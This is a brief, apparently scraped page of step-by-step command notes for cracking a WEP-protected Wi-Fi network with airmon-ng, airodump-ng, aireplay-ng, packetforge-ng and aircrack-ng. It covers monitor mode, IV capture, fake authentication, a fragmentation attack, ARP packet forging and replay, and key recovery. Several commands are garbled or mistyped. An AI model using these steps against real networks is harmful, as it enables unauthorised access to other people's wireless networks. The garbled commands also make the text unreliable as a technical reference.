Sei sulla pagina 1di 1

open console airmon -ng airmon -ng start interface enter (monitor mode enable on XXXX) airodump-ng XXXX

Enter ctrl C ESSID / BSSID Copy BSSID airodump -ng --bssid Paste --channel X --ivs -w NAME OF FILE XXXX open a new terimnial aireplay -ng ~ -5 -b BSSID XXXX use this packet press Y aireplay-ng -1 1 -a BSSID XXXX close packetforge-ng -0 -a BSSID -h 00:11:22:33:44:55 -l 255.255.255.255 -k 255.255.25 5.255 copy the fragment file ~ -y filename -w arpsta aireplay-ng -3 -r arpy -b BSSID XXXX open new console aircrack-ng Fusion.ivs

Potrebbero piacerti anche